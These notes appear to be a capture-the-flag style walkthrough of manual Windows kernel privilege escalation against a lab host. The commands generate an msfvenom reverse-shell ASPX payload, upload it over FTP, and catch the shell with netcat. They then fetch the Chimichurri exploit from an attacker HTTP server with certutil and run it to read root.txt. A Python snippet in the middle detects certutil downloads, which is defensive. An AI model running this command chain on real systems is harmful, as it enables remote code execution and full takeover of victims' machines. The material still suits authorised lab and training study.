Manual Kernel Exploitation

Create a non-Meterpreter shell:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4444 -f aspx > manual.aspx

FTP to victim machine:

ftp 10.10.10.5

Open a listener on the same port used when creating the shell:

nc -nvlp 4444

Navigate to website:

10.10.10.5/manual.aspx

You should now have a shell.

Find an exploit that works (we found Chimichurri 59) and download it

Get it there:

Host a Python server in the Downloads folder (or wherever it is):

cd Downloads/
python3 -m http.server 8080

On the victim (Windows):

Go to temp folder:

cd c:\windows\temp

The Windows equivalent of wget is certutil:

certutil -urlcache -f http://10.10.14.19:8080/Chimichurri.exe ms.exe

-f is file

Chimichurri.exe is the name of what we downloaded
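
From the defender's side, the certutil download above is easy to spot in process-creation logs. The following is an added example, not part of the original notes: it flags certutil -urlcache downloads in constructed sample events. The event field names (image, cwd, cmdline) and the scoring rules are assumptions for illustration.

```python
import re

# Constructed process-creation events (shape loosely modelled on Sysmon Event ID 1).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "cwd": r"c:\windows\temp",
     "cmdline": "certutil -urlcache -f http://10.10.14.19:8080/Chimichurri.exe ms.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "cwd": r"C:\Users\admin",
     "cmdline": "CertUtil.exe /URLCache /split /f https://example.test/a.txt a.txt"},
    {"image": r"C:\Windows\System32\certutil.exe", "cwd": r"C:\Users\admin",
     "cmdline": "certutil -hashfile setup.msi SHA256"},
    {"image": r"C:\Windows\System32\cmd.exe", "cwd": r"C:\Windows",
     "cmdline": "cmd /c echo certutil -urlcache"},
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.I)
RAW_IP_RE = re.compile(r"^[a-z]+://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?(?:/|$)", re.I)
EXEC_EXT = (".exe", ".dll", ".ps1", ".bat", ".vbs", ".hta")
STAGING_DIRS = (r"\windows\temp", r"\appdata\local\temp", r"\users\public")


def analyze(event):
    """Return a finding for a certutil URL download, or None for anything else."""
    # Match on the executed image, not on the string "certutil" in the command line.
    if not event["image"].lower().endswith("\\certutil.exe"):
        return None
    tokens = event["cmdline"].split()[1:]
    # certutil accepts both "-switch" and "/switch", case-insensitively.
    switches = {t[1:].lower() for t in tokens if t[0] in "-/"}
    args = [t for t in tokens if t[0] not in "-/"]
    url = next((a for a in args if URL_RE.match(a)), None)
    if "urlcache" not in switches or url is None:
        return None
    rest = args[args.index(url) + 1:]
    outfile = rest[0] if rest else None
    reasons = ["certutil -urlcache fetching a remote URL"]
    if RAW_IP_RE.match(url):
        reasons.append("URL host is a raw IP address")
    if outfile and outfile.lower().endswith(EXEC_EXT):
        reasons.append("output file has an executable extension")
    if any(d in event["cwd"].lower() for d in STAGING_DIRS):
        reasons.append("run from a temp/public staging directory")
    severity = "high" if len(reasons) > 1 else "medium"
    return {"url": url, "outfile": outfile, "severity": severity, "reasons": reasons}


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(analyze(ev) or "no finding", "<-", ev["cmdline"])
```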

To check it’s there, run dir and look for ms.exe:

dir

Find out usage. Chimichurri usage:

ms.exe 10.10.14.19 5555

Arguments: the exe, the attacker machine IP, and the port opened on netcat on Kali (open a new listener before hitting Enter).

cd to the desktop:

cd c:\users\administrator\desktop

Print the file:

type root.txt